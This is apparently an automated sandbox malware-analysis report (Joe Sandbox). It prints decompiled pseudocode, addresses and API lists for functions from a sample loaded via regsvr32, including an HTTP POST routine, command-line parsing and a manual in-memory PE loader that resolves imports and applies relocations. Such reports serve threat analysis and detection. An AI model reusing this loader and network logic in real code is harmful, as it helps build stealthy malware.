											_t129 = E0316A102( &_v20, __eflags);
											__eflags = _t129 - 0xc8;
											if(_t129 == 0xc8) {
												 *_a20 = _t194;
												 *_a12 = _t189;
												 *_a16 = _t165;
												__eflags = 0;
												return 0;
											}
											_v12 =  ~_t129;
											L29:
											_t135 =  *0x317f8f0; // 0x0
											 *((intOrPtr*)(_t135 + 8))(_t194);
											_t195 = _v12;
											L30:
											__eflags = _t165;
											if(_t165 != 0) {
												_t139 =  *0x317f8f0; // 0x0
												 *((intOrPtr*)(_t139 + 8))(_t165);
											}
											__eflags = _t189;
											if(_t189 != 0) {
												_t179 =  *0x317f8f0; // 0x0
												 *((intOrPtr*)(_t179 + 8))(_t189);
											}
											return _t195;
										}
										GetLastError();
										_v12 = 0xfffffff8;
										goto L29;
									} else {
										GetLastError();
										_t143 =  *0x317f8f0; // 0x0
										 *((intOrPtr*)(_t143 + 8))(_t194);
										_t145 =  *0x317f8f0; // 0x0
										_v8 = _v8 & 0x00000000;
										 *((intOrPtr*)(_t145 + 8))(_t165);
										_t147 =  *0x317f8f0; // 0x0
										_t165 = 0;
										__eflags = 0;
										 *((intOrPtr*)(_t147 + 8))(_t189);
										_t194 = _v8;
										goto L21;
									}
								} else {
									GetLastError();
									_t153 =  *0x317f8f0; // 0x0
									 *((intOrPtr*)(_t153 + 8))(_t165);
									_t155 =  *0x317f8f0; // 0x0
									_t165 = 0;
									 *((intOrPtr*)(_t155 + 8))(_t189);
									_t189 = 0;
									_t194 = _v8;
									goto L22;
								}
							} else {
								GetLastError();
								_t159 =  *0x317f8f0; // 0x0
								 *((intOrPtr*)(_t159 + 8))(_t189);
								L21:
								_t189 = 0;
								__eflags = 0;
								goto L22;
							}
						}
						GetLastError();
						L22:
						_t186 = _t194;
						_t104 = _v12 + 1;
						_v12 = _t104;
						__eflags = _t104 - 2;
					} while (_t104 < 2);
					__eflags = _t186;
					if(_t186 != 0) {
						goto L25;
					}
					_t195 = 0xfffffffe;
					goto L30;
				}
				_t163 = 0xfffffffc;
				return _t163;
			}






























































            0x0316f7b1
            0x0316f7bd
            0x0316f7c4
            0x0316f7d1
            0x0316f7d4
            0x0316f7e5
            0x0316f7ef
            0x0316f7fa
            0x0316f807
            0x0316f814
            0x0316f821
            0x0316f824
            0x0316f829
            0x0316f82e
            0x0316f830
            0x0316f838
            0x0316f840
            0x0316f847
            0x0316f853
            0x0316f856
            0x0316f864
            0x0316f867
            0x0316f86d
            0x0316f86e
            0x0316f870
            0x0316f879
            0x0316f87a
            0x0316f87f
            0x0316f885
            0x0316f88f
            0x0316f88f
            0x0316f891
            0x0316f896
            0x0316f8a0
            0x0316f8ab
            0x0316f8b4
            0x0316f8b6
            0x0316f8b8
            0x0316f8c7
            0x0316f8de
            0x0316f8e4
            0x0316f8e7
            0x0316f8eb
            0x0316f8ed
            0x0316f8f2
            0x0316f8f2
            0x0316f8f7
            0x0316f8f9
            0x0316f90f
            0x0316f913
            0x0316f918
            0x0316f91a
            0x0316f91a
            0x0316f92e
            0x0316f939
            0x0316f93c
            0x0316f93f
            0x0316f942
            0x0316f947
            0x0316f94c
            0x0316f94c
            0x0316f94f
            0x0316f951
            0x0316f977
            0x0316f97b
            0x0316f97f
            0x0316f97f
            0x0316f989
            0x0316f991
            0x0316f996
            0x0316f9a1
            0x0316f9a7
            0x0316f9b1
            0x0316f9b4
            0x0316f9b9
            0x0316f9bd
            0x0316f9c2
            0x0316f9c2
            0x0316f9c7
            0x0316f9cb
            0x0316fa16
            0x0316fa18
            0x0316fa1b
            0x0316fa23
            0x0316fa27
            0x0316fa2a
            0x0316fa3c
            0x0316fa47
            0x0316fa49
            0x0316fa5d
            0x0316fa62
            0x0316fa67
            0x0316fa9c
            0x0316faa1
            0x0316faa6
            0x0316faa8
            0x00000000
            0x0316faa8
            0x0316fa6b
            0x0316fa6e
            0x0316fa6e
            0x0316fa74
            0x0316fa77
            0x0316fa7a
            0x0316fa7a
            0x0316fa7c
            0x0316fa7e
            0x0316fa84
            0x0316fa84
            0x0316fa87
            0x0316fa89
            0x0316fa8b
            0x0316fa92
            0x0316fa92
            0x00000000
            0x0316fa95
            0x0316fa4b
            0x0316fa51
            0x00000000
            0x0316f9cd
            0x0316f9cd
            0x0316f9d3
            0x0316f9d9
            0x0316f9dc
            0x0316f9e1
            0x0316f9e6
            0x0316f9e9
            0x0316f9ee
            0x0316f9ee
            0x0316f9f1
            0x0316f9f4
            0x00000000
            0x0316f9f4
            0x0316f953
            0x0316f953
            0x0316f959
            0x0316f95f
            0x0316f962
            0x0316f967
            0x0316f96a
            0x0316f96d
            0x0316f96f
            0x00000000
            0x0316f96f
            0x0316f8fb
            0x0316f8fb
            0x0316f901
            0x0316f907
            0x0316f9f7
            0x0316f9f7
            0x0316f9f7
            0x00000000
            0x0316f9f7
            0x0316f8f9
            0x0316f8ba
            0x0316f9f9
            0x0316f9fc
            0x0316f9fe
            0x0316fa01
            0x0316fa04
            0x0316fa04
            0x0316fa0d
            0x0316fa0f
            0x00000000
            0x00000000
            0x0316fa13
            0x00000000
            0x0316fa13
            0x0316f889
            0x00000000

            APIs
            • memset.MSVCRT ref: 0316F7D4
            • memset.MSVCRT ref: 0316F7E5
              • Part of subcall function 03168F63: memset.MSVCRT ref: 03168F75
            • GetLastError.KERNEL32(?,?,?,?,?,?,00000000,000007D0,00000000), ref: 0316F8BA
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.252637894.0000000003160000.00000040.00000800.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_3160000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: memset$ErrorLast
            • String ID: POST
            • API String ID: 2570506013-1814004025
            • Opcode ID: fb284558bb22c9b1a8268b2f256e75cc0b1c55bb59ae2da8993ee0da8b80e1f8
            • Instruction ID: 54a8578ba2de461da3f77add017646682671fff040b524577553a99727aa398b
            • Opcode Fuzzy Hash: fb284558bb22c9b1a8268b2f256e75cc0b1c55bb59ae2da8993ee0da8b80e1f8
            • Instruction Fuzzy Hash: 0EA14D75900319AFDB14EFA4D888AAEBBF8FF4C310F194069F515E7250DB349A56CBA0
            Uniqueness

            Uniqueness Score: -1.00%

            Function 031714C5 Relevance: 10.9, APIs: 2, Strings: 4, Instructions: 445COMMON
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.252637894.0000000003160000.00000040.00000800.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_3160000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: _snprintfqsort
            • String ID: %I64d$false$null$true
            • API String ID: 756996078-4285102228
            • Opcode ID: 43a88a3021970acc07e24e2397186e6ab81b80b3d757f01ac1799cbff9e3d38c
            • Instruction ID: f9fcd644b66ef590a7444bbc385834ab5ac0600448919251e3b5748785fd8a62
            • Opcode Fuzzy Hash: 43a88a3021970acc07e24e2397186e6ab81b80b3d757f01ac1799cbff9e3d38c
            • Instruction Fuzzy Hash: DAE16CB594020ABFDF15EE64CC41EAF3B79EF4D784F184065FD169A240E731DAA18BA0
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0316503F Relevance: 9.2, APIs: 6, Instructions: 247stringCOMMON
            Download Yara Rule
            C-Code - Quality: 83%
            			E0316503F(void* __ecx, void* __edx, void* __fp0, intOrPtr* _a4, WCHAR* _a8, WCHAR* _a12) {
				void _v532;
				char _v548;
				char _v580;
				char _v584;
				short _v588;
				WCHAR* _v592;
				WCHAR* _v596;
				intOrPtr _v600;
				char _v628;
				char _v632;
				void* __ebx;
				void* __esi;
				short _t47;
				WCHAR* _t54;
				WCHAR* _t55;
				intOrPtr _t56;
				signed int _t61;
				void* _t65;
				void* _t66;
				WCHAR* _t67;
				intOrPtr _t68;
				WCHAR* _t70;
				intOrPtr _t71;
				WCHAR* _t73;
				WCHAR* _t83;
				intOrPtr _t84;
				void* _t85;
				intOrPtr _t86;
				void* _t93;
				intOrPtr _t94;
				intOrPtr _t96;
				void* _t99;
				void* _t100;
				WCHAR* _t101;
				void* _t112;
				WCHAR* _t116;
				intOrPtr _t127;
				void* _t128;
				void* _t146;
				WCHAR* _t149;
				void* _t150;
				void* _t152;
				void* _t156;
				WCHAR* _t157;
				WCHAR* _t159;
				signed int _t160;
				signed int _t161;
				intOrPtr* _t163;
				signed int _t165;
				void* _t168;
				void* _t169;
				intOrPtr* _t170;
				void* _t175;

				_t175 = __fp0;
				_push(_t160);
				_t99 = __edx;
				_t156 = __ecx;
				_t161 = _t160 | 0xffffffff;
				memset( &_v532, 0, 0x20c);
				_t168 = (_t165 & 0xfffffff8) - 0x254 + 0xc;
				_v592 = 1;
				if(_t156 != 0) {
					_t94 =  *0x317f8d4; // 0x4fafc00
					_t3 = _t94 + 0x110; // 0x4fb16d0
					_t96 =  *0x317f8d8; // 0x4fafab0
					_v600 =  *((intOrPtr*)(_t96 + 0x68))(_t156,  *((intOrPtr*)( *_t3)));
				}
				if(E0316CB85(_t156) != 0) {
					L4:
					_t47 = E0316C85A();
					_push(_t99);
					_v588 = _t47;
					E0316C64D(_t47,  &_v580, _t173, _t175);
					_t100 = E03164FFB( &_v580,  &_v580, _t173);
					_t112 = E0316E34A( &_v580, E0316A5D0( &_v580), 0);
					E0316C870(_t112,  &_v548, _t175);
					_push(_t112);
					_t54 = E03163174(_t156,  &_v580, _t173, _t175);
					_v596 = _t54;
					if(_t54 != 0) {
						_push(0);
						_push(_t100);
						_push(0x317c9d8);
						_t55 = E03169C50(_t54);
						_t169 = _t168 + 0x10;
						_t101 = _t55;
						__eflags = _v592;
						if(__eflags != 0) {
							_t56 = E03169AB3(_v596);
							_t116 = _t101;
							 *0x317f990 = _t56;
							 *0x317f988 = E03169AB3(_t116);
							L12:
							_push(_t116);
							_t157 = E0316A7C6( &_v532, _t156, _t175, _v588,  &_v584,  &_v596);
							_t170 = _t169 + 0x10;
							__eflags = _t157;
							if(_t157 == 0) {
								goto L36;
							}
							_push(0x317ca26);
							_t146 = 0xe;
							E0316AC36(_t146, _t175);
							E0316AC6F(_t157, _t175, _t101);
							_t163 = _a4;
							_push( *_t163);
							E0316AC11(0xb);
							_t148 =  *(_t163 + 0x10);
							__eflags =  *(_t163 + 0x10);
							if( *(_t163 + 0x10) != 0) {
								E0316B1B1(_t148, _t175);
							}
							_t149 =  *(_t163 + 0xc);
							__eflags = _t149;
							if(_t149 != 0) {
								E0316B1B1(_t149, _t175);
							}
							_t65 = E0316A1F8(0);
							_push(_t149);
							_t150 = 2;
							_t66 = E0316ABE3();
							__eflags = _v592;
							_t127 = _t65;
							if(_v592 == 0) {
								_t127 =  *0x317f8d4; // 0x4fafc00
								__eflags =  *((intOrPtr*)(_t127 + 0xa4)) - 1;
								if(__eflags != 0) {
									_t67 = E03170DDF(_t66, _t101, _t150, _t175, 0, _t101, 0);
									_t170 = _t170 + 0xc;
									goto L21;
								}
								_t127 = _t127 + 0x228;
								goto L20;
							} else {
								_t68 =  *0x317f8d4; // 0x4fafc00
								__eflags =  *((intOrPtr*)(_t68 + 0xa4)) - 1;
								if(__eflags != 0) {
									L27:
									__eflags =  *(_t68 + 0x1898) & 0x00000082;
									if(( *(_t68 + 0x1898) & 0x00000082) != 0) {
										_t152 = 0x64;
										E0316F15B(_t152);
									}
									E0316565D( &_v580, _t175);
									_t159 = _a8;
									_t128 = _t127;
									__eflags = _t159;
									if(_t159 != 0) {
										_t71 =  *0x317f8d4; // 0x4fafc00
										__eflags =  *((intOrPtr*)(_t71 + 0xa0)) - 1;
										if( *((intOrPtr*)(_t71 + 0xa0)) != 1) {
											lstrcpyW(_t159, _t101);
										} else {
											_t73 = E0316109A(_t128, 0x153);
											_v596 = _t73;
											lstrcpyW(_t159, _t73);
											E03168D9A( &_v596);
											 *_t170 = "\"";
											lstrcatW(_t159, ??);
											lstrcatW(_t159, _t101);
											lstrcatW(_t159, "\"");
										}
									}
									_t70 = _a12;
									__eflags = _t70;
									if(_t70 != 0) {
										 *_t70 = _v588;
									}
									_t161 = 0;
									__eflags = 0;
									goto L36;
								}
								_t32 = _t68 + 0x228; // 0x4fafe28
								_t127 = _t32;
								L20:
								_t67 = E031658D2(_t127, _t101, __eflags);
								L21:
								__eflags = _t67;
								if(_t67 >= 0) {
									_t68 =  *0x317f8d4; // 0x4fafc00
									goto L27;
								}
								_push(0xfffffffd);
								L6:
								_pop(_t161);
								goto L36;
							}
						}
						_t83 = E0316D210(_v588, __eflags);
						_v596 = _t83;
						_t84 =  *0x317f8d0; // 0x4faf8c0
						_t85 =  *((intOrPtr*)(_t84 + 0xdc))(_t83, 0x80003, 6, 0xff, 0x400, 0x400, 0, 0);
						__eflags = _t85 - _t161;
						if(_t85 != _t161) {
							_t86 =  *0x317f8d0; // 0x4faf8c0
							 *((intOrPtr*)(_t86 + 0x30))();
							E03168DDF( &_v632, _t161);
							_t116 = _t85;
							goto L12;
						}
						E03168DDF( &_v628, _t161);
						_t61 = 1;
						goto L37;
					}
					_push(0xfffffffe);
					goto L6;
				} else {
					_t93 = E0316308A( &_v532, _t161, 0x105);
					_t173 = _t93;
					if(_t93 == 0) {
						L36:
						_t61 = _t161;
						L37:
						return _t61;
					}
					goto L4;
				}
			}
























































            0x0316503f
            0x0316504c
            0x03165057
            0x0316505c
            0x0316505e
            0x03165061
            0x03165066
            0x03165069
            0x03165073
            0x03165075
            0x0316507a
            0x03165082
            0x0316508b
            0x0316508b
            0x03165098
            0x031650b3
            0x031650b5
            0x031650ba
            0x031650bf
            0x031650c5
            0x031650d4
            0x031650f3
            0x031650f5
            0x031650fa
            0x03165101
            0x03165106
            0x0316510d
            0x03165117
            0x03165119
            0x0316511a
            0x03165120
            0x03165125
            0x03165128
            0x0316512a
            0x0316512f
            0x03165196
            0x0316519b
            0x0316519d
            0x031651a7
            0x031651ac
            0x031651ac
            0x031651c6
            0x031651c8
            0x031651cb
            0x031651cd
            0x00000000
            0x00000000
            0x031651d3
            0x031651da
            0x031651dd
            0x031651e6
            0x031651eb
            0x031651f1
            0x031651f6
            0x031651fb
            0x031651ff
            0x03165201
            0x03165205
            0x03165205
            0x0316520a
            0x0316520d
            0x0316520f
            0x03165213
            0x03165213
            0x0316521a
            0x0316521f
            0x03165223
            0x03165226
            0x0316522b
            0x03165231
            0x03165232
            0x0316525a
            0x03165260
            0x03165267
            0x03165276
            0x0316527b
            0x00000000
            0x0316527b
            0x03165269
            0x00000000
            0x03165234
            0x03165234
            0x03165239
            0x03165240
            0x03165285
            0x03165285
            0x0316528c
            0x03165290
            0x03165291
            0x03165291
            0x0316529b
            0x031652a0
            0x031652a3
            0x031652a4
            0x031652a6
            0x031652a8
            0x031652ad
            0x031652b4
            0x031652f7
            0x031652b6
            0x031652bb
            0x031652c3
            0x031652c7
            0x031652d2
            0x031652dd
            0x031652e5
            0x031652e9
            0x031652f1
            0x031652f1
            0x031652b4
            0x031652fd
            0x03165300
            0x03165302
            0x03165308
            0x03165308
            0x0316530a
            0x0316530a
            0x00000000
            0x0316530a
            0x03165242
            0x03165242
            0x03165248
            0x0316524a
            0x0316524f
            0x0316524f
            0x03165251
            0x03165280
            0x00000000
            0x03165280
            0x03165253
            0x03165111
            0x03165111
            0x00000000
            0x03165111
            0x03165232
            0x03165135
            0x03165143
            0x03165156
            0x0316515b
            0x03165161
            0x03165163
            0x0316517b
            0x03165180
            0x03165189
            0x0316518f
            0x00000000
            0x0316518f
            0x0316516b
            0x03165174
            0x00000000
            0x03165174
            0x0316510f
            0x00000000
            0x0316509a
            0x031650a5
            0x031650ab
            0x031650ad
            0x0316530c
            0x0316530c
            0x0316530e
            0x03165314
            0x03165314
            0x00000000
            0x031650ad

            APIs
            • memset.MSVCRT ref: 03165061
            • lstrcpyW.KERNEL32 ref: 031652C7
            • lstrcatW.KERNEL32(00000000,?), ref: 031652E5
            • lstrcatW.KERNEL32(00000000,00000000), ref: 031652E9
            • lstrcatW.KERNEL32(00000000,0317CA28), ref: 031652F1
              • Part of subcall function 03168DDF: HeapFree.KERNEL32(00000000,00000000), ref: 03168E25
            Memory Dump Source
            • Source File: 00000003.00000002.252637894.0000000003160000.00000040.00000800.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_3160000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: lstrcat$FreeHeaplstrcpymemset
            • String ID:
            • API String ID: 911671052-0
            • Opcode ID: 23939c2c899062f49bfc0bc0610b91b6c20926c2889a03379b521bb7244bfd5a
            • Instruction ID: 6cb9a26ae453ed506d30ccef643869a3dd5158746c1cfb0d6bcb04711a98cba0
            • Opcode Fuzzy Hash: 23939c2c899062f49bfc0bc0610b91b6c20926c2889a03379b521bb7244bfd5a
            • Instruction Fuzzy Hash: D971D075604301ABD718EBA4DC44B7F73EAAFCD710F18092DF4569B2C0EB7098A58BA1
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0316DEAB Relevance: 9.1, APIs: 6, Instructions: 98stringCOMMON
            Download Yara Rule
            C-Code - Quality: 93%
            			E0316DEAB(WCHAR* __ecx) {
				int _v8;
				WCHAR* _v12;
				WCHAR* _v16;
				WCHAR* _v140;
				WCHAR* _v144;
				short _v664;
				signed int _t28;
				signed int _t29;
				signed int _t30;
				WCHAR* _t36;
				int _t40;
				signed int _t41;
				int _t44;
				signed int _t45;
				WCHAR* _t49;
				signed int _t51;
				WCHAR* _t52;
				void* _t53;

				_v8 = _v8 & 0x00000000;
				_v16 = __ecx;
				_t51 = 0;
				_t28 = CommandLineToArgvW(GetCommandLineW(),  &_v8);
				_t44 = _v8;
				_t41 = 0;
				_v12 = _t28;
				if(_t44 <= 0) {
					L22:
					_t29 = _t28 | 0xffffffff;
					__eflags = _t29;
					return _t29;
				} else {
					goto L1;
				}
				do {
					L1:
					_t49 =  *(_t28 + _t41 * 4);
					_t30 =  *_t49 & 0x0000ffff;
					if(_t30 != 0 && _t30 != 0xd && _t30 != 0xa && _t30 != 0x2d && _t30 != 0x2f && _t51 < 0x20) {
						 *(_t53 + _t51 * 4 - 0x8c) = _t49;
						_t40 = lstrlenW(_t49);
						_t45 = 0;
						if(_t40 <= 0) {
							L11:
							_t44 = _v8;
							_t51 = _t51 + 1;
							goto L12;
						} else {
							goto L8;
						}
						do {
							L8:
							if(_t49[_t45] == 0x2c) {
								_t49[_t45] = 0;
							}
							_t45 = _t45 + 1;
						} while (_t45 < _t40);
						goto L11;
					}
					L12:
					_t28 = _v12;
					_t41 = _t41 + 1;
				} while (_t41 < _t44);
				if(_t51 != 1) {
					if(__eflags <= 0) {
						goto L22;
					}
					_t52 = _v140;
					L17:
					if( *_t52 == 0x5c || _t52[1] == 0x3a) {
						lstrcpynW(_v16, _t52, 0x104);
					} else {
						GetCurrentDirectoryW(0x104,  &_v664);
						_push(0);
						_push(_t52);
						_push(0x317c9d8);
						_t36 = E03169C50( &_v664);
						_v12 = _t36;
						lstrcpynW(_v16, _t36, 0x104);
						E03168DDF( &_v12, 0xfffffffe);
					}
					return 0;
				}
				_t52 = _v144;
				goto L17;
			}





















            0x0316deb4
            0x0316debb
            0x0316debe
            0x0316decb
            0x0316ded1
            0x0316ded4
            0x0316ded6
            0x0316dedb
            0x0316dfb3
            0x0316dfb3
            0x0316dfb3
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x0316dee1
            0x0316dee1
            0x0316dee1
            0x0316dee4
            0x0316deea
            0x0316df06
            0x0316df0d
            0x0316df13
            0x0316df17
            0x0316df2b
            0x0316df2b
            0x0316df2e
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x0316df19
            0x0316df19
            0x0316df1e
            0x0316df22
            0x0316df22
            0x0316df26
            0x0316df27
            0x00000000
            0x0316df19
            0x0316df2f
            0x0316df2f
            0x0316df32
            0x0316df33
            0x0316df3a
            0x0316df44
            0x00000000
            0x00000000
            0x0316df46
            0x0316df4c
            0x0316df50
            0x0316dfa9
            0x0316df59
            0x0316df66
            0x0316df6c
            0x0316df6e
            0x0316df75
            0x0316df7b
            0x0316df83
            0x0316df8b
            0x0316df97
            0x0316df9d
            0x00000000
            0x0316dfaf
            0x0316df3c
            0x00000000

            APIs
            • GetCommandLineW.KERNEL32 ref: 0316DEC0
            • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 0316DECB
            • lstrlenW.KERNEL32 ref: 0316DF0D
            • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0316DF66
            • lstrcpynW.KERNEL32(?,00000000,00000104), ref: 0316DF8B
            • lstrcpynW.KERNEL32(?,?,00000104), ref: 0316DFA9
            Memory Dump Source
            • Source File: 00000003.00000002.252637894.0000000003160000.00000040.00000800.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_3160000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: CommandLinelstrcpyn$ArgvCurrentDirectorylstrlen
            • String ID:
            • API String ID: 1259063344-0
            • Opcode ID: c0683dc77805b05431262ebab4bb753e7ea9cd85ec255705c6f716951b19825b
            • Instruction ID: a30887a8ca4a1a5c8d27dea610e7307b3d1ecb09adc6f4005967905fa3034260
            • Opcode Fuzzy Hash: c0683dc77805b05431262ebab4bb753e7ea9cd85ec255705c6f716951b19825b
            • Instruction Fuzzy Hash: D231D971E10115ABDF28EBD5E854A6DF7BCEF4D311F1840D9E401E6150DB7099A68B60
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0316E6D9 Relevance: 9.1, APIs: 6, Instructions: 87memoryCOMMON
            Download Yara Rule
            APIs
            • SysAllocString.OLEAUT32(00000000), ref: 0316E6ED
            • SysAllocString.OLEAUT32(?), ref: 0316E6F5
            • SysAllocString.OLEAUT32(00000000), ref: 0316E709
            • SysFreeString.OLEAUT32(?), ref: 0316E784
            • SysFreeString.OLEAUT32(?), ref: 0316E787
            • SysFreeString.OLEAUT32(?), ref: 0316E78C
            Memory Dump Source
            • Source File: 00000003.00000002.252637894.0000000003160000.00000040.00000800.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_3160000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: String$AllocFree
            • String ID:
            • API String ID: 344208780-0
            • Opcode ID: 5afcbedcc176c7f9123d48337d1cbad2b01c4a5453916b719909056950c8aa50
            • Instruction ID: 82d16ac94bb1756c18f74e1f8a3a8f6e9fb56b1c901ed09025537478cf80c531
            • Opcode Fuzzy Hash: 5afcbedcc176c7f9123d48337d1cbad2b01c4a5453916b719909056950c8aa50
            • Instruction Fuzzy Hash: 36211975900218BFDB04DFE4CD88DAEBBBDEF88254B244499E505EB250D770AE01CBA0
            Uniqueness

            Uniqueness Score: -1.00%

            Function 03173DC7 Relevance: 7.8, APIs: 5, Instructions: 322libraryloaderstringCOMMON
            Download Yara Rule
            C-Code - Quality: 20%
            			E03173DC7(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, CHAR* _a16, intOrPtr _a20) {
				signed int _v5;
				signed short _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				signed int* _v24;
				unsigned int _v28;
				signed short* _v32;
				struct HINSTANCE__* _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr* _v48;
				signed short* _v52;
				intOrPtr _v56;
				unsigned int _v60;
				intOrPtr _v64;
				_Unknown_base(*)()* _v68;
				signed int _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				unsigned int _v88;
				intOrPtr _v92;
				signed int _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				CHAR* _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _t216;
				signed int _t233;
				void* _t273;
				signed int _t278;
				signed int _t280;
				intOrPtr _t320;

				_v44 = _v44 & 0x00000000;
				_v84 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
				_v20 = _v84;
				_t320 = _a4 -  *((intOrPtr*)(_v20 + 0x34));
				_v64 = _t320;
				if(_t320 == 0) {
					L13:
					while(0 != 0) {
					}
					_push(8);
					if( *((intOrPtr*)(_v20 + 0xbadc25)) == 0) {
						L35:
						if(_a16 == 0) {
							L54:
							_v80 =  *((intOrPtr*)(_v20 + 0x28)) + _a4;
							while(0 != 0) {
							}
							if(_a12 != 0) {
								 *_a12 = _v80;
							}
							 *((intOrPtr*)(_v20 + 0x34)) = _a4;
							_v124 = _v80(_a4, 1, _a8);
							while(0 != 0) {
							}
							if(_v124 != 0) {
								if(_v44 == 0) {
									L77:
									return 1;
								}
								if(_a20 != 1) {
									if(_a20 != 2) {
										L75:
										while(0 != 0) {
										}
										goto L77;
									}
									while(0 != 0) {
									}
									_v132 = _v44;
									goto L75;
								}
								while(0 != 0) {
								}
								_v44();
								goto L75;
							}
							while(0 != 0) {
							}
							return 0;
						}
						while(0 != 0) {
						}
						_push(8);
						if( *((intOrPtr*)(_v20 + 0x78)) == 0) {
							goto L54;
						}
						_v128 = 0x80000000;
						_t216 = 8;
						_v76 = _a4 +  *((intOrPtr*)(_v20 + 0x78 + _t216 * 0));
						_v108 = _a4 +  *((intOrPtr*)(_v76 + 0x20));
						_v112 = _a4 +  *((intOrPtr*)(_v76 + 0x1c));
						_v104 =  *((intOrPtr*)(_v76 + 0x18));
						while(0 != 0) {
						}
						_v40 = _v40 & 0x00000000;
						while(_v40 < _v104) {
							_v116 = _a4 +  *((intOrPtr*)(_v108 + _v40 * 4));
							_v120 = _a4 +  *((intOrPtr*)(_v112 + _v40 * 4));
							if(lstrcmpA(_v116, _a16) != 0) {
								_v40 = _v40 + 1;
								continue;
							}
							while(0 != 0) {
							}
							_v44 = _v120;
							break;
						}
						if(_v44 != 0) {
							goto L54;
						}
						while(0 != 0) {
						}
						return 0xffffffff;
					}
					_v96 = 0x80000000;
					_t233 = 8;
					_v16 = _a4 +  *((intOrPtr*)(_v20 + (_t233 << 0) + 0x78));
					while( *((intOrPtr*)(_v16 + 0xc)) != 0) {
						_v36 = GetModuleHandleA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
						if(_v36 == 0) {
							_v36 = LoadLibraryA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
						}
						if(_v36 != 0) {
							if( *_v16 == 0) {
								_v24 =  *((intOrPtr*)(_v16 + 0x10)) + _a4;
							} else {
								_v24 =  *_v16 + _a4;
							}
							_v72 = _v72 & 0x00000000;
							while( *_v24 != 0) {
								if(( *_v24 & _v96) == 0) {
									_v100 =  *_v24 + _a4;
									_v68 = GetProcAddress(_v36, _v100 + 2);
								} else {
									_v68 = GetProcAddress(_v36,  *_v24 & 0x0000ffff);
								}
								if( *((intOrPtr*)(_v16 + 0x10)) == 0) {
									 *_v24 = _v68;
								} else {
									 *( *((intOrPtr*)(_v16 + 0x10)) + _a4 + _v72) = _v68;
								}
								_v24 =  &(_v24[1]);
								_v72 = _v72 + 4;
							}
							_v16 = _v16 + 0x14;
							continue;
						} else {
							_t273 = 0xfffffffd;
							return _t273;
						}
					}
					goto L35;
				}
				_t278 = 8;
				_v52 = _a4 +  *((intOrPtr*)(_v20 + 0x78 + _t278 * 5));
				_t280 = 8;
				_v56 =  *((intOrPtr*)(_v20 + 0x7c + _t280 * 5));
				while(0 != 0) {
				}
				while(_v56 > 0) {
					_v28 = _v52[2];
					_v56 = _v56 - _v28;
					_v28 = _v28 - 8;
					_v28 = _v28 >> 1;
					_v32 =  &(_v52[4]);
					_v92 = _a4 +  *_v52;
					_v60 = _v28;
					while(1) {
						_v88 = _v60;
						_v60 = _v60 - 1;
						if(_v88 == 0) {
							break;
						}
						_v5 = ( *_v32 & 0x0000ffff) >> 0xc;
						_v12 =  *_v32 & 0xfff;
						_v48 = (_v12 & 0x0000ffff) + _v92;
						if((_v5 & 0x000000ff) != 3) {
							if((_v5 & 0x000000ff) == 0xa) {
								 *_v48 =  *_v48 + _v64;
							}
						} else {
							 *_v48 =  *_v48 + _v64;
						}
						_v32 =  &(_v32[1]);
					}
					_v52 = _v32;
				}
				goto L13;
			}









































            0x03173dd0
            0x03173ddd
            0x03173de3
            0x03173dec
            0x03173def
            0x03173df2
            0x00000000
            0x03173ee3
            0x03173ee7
            0x03173ee9
            0x03173ef7
            0x03174015
            0x03174019
            0x031740de
            0x031740e7
            0x031740ea
            0x031740ee
            0x031740f4
            0x031740fc
            0x031740fc
            0x03174104
            0x03174112
            0x03174115
            0x03174119
            0x0317411f
            0x0317412f
            0x0317415a
            0x00000000
            0x0317415c
            0x03174135
            0x03174146
            0x00000000
            0x03174154
            0x03174158
            0x00000000
            0x03174154
            0x03174148
            0x0317414c
            0x03174151
            0x00000000
            0x03174151
            0x03174137
            0x0317413b
            0x0317413d
            0x00000000
            0x0317413d
            0x03174121
            0x03174125
            0x00000000
            0x03174127
            0x0317401f
            0x03174023
            0x03174025
            0x03174033
            0x00000000
            0x00000000
            0x03174039
            0x03174042
            0x03174050
            0x0317405c
            0x03174068
            0x03174071
            0x03174074
            0x03174078
            0x0317407a
            0x03174087
            0x0317409b
            0x031740aa
            0x031740bb
            0x03174084
            0x00000000
            0x03174084
            0x031740bd
            0x031740c1
            0x031740c6
            0x00000000
            0x031740c6
            0x031740d1
            0x00000000
            0x00000000
            0x031740d3
            0x031740d7
            0x00000000
            0x031740d9
            0x03173efd
            0x03173f06
            0x03173f14
            0x03173f17
            0x03173f34
            0x03173f3b
            0x03173f4d
            0x03173f4d
            0x03173f54
            0x03173f64
            0x03173f7c
            0x03173f66
            0x03173f6e
            0x03173f6e
            0x03173f7f
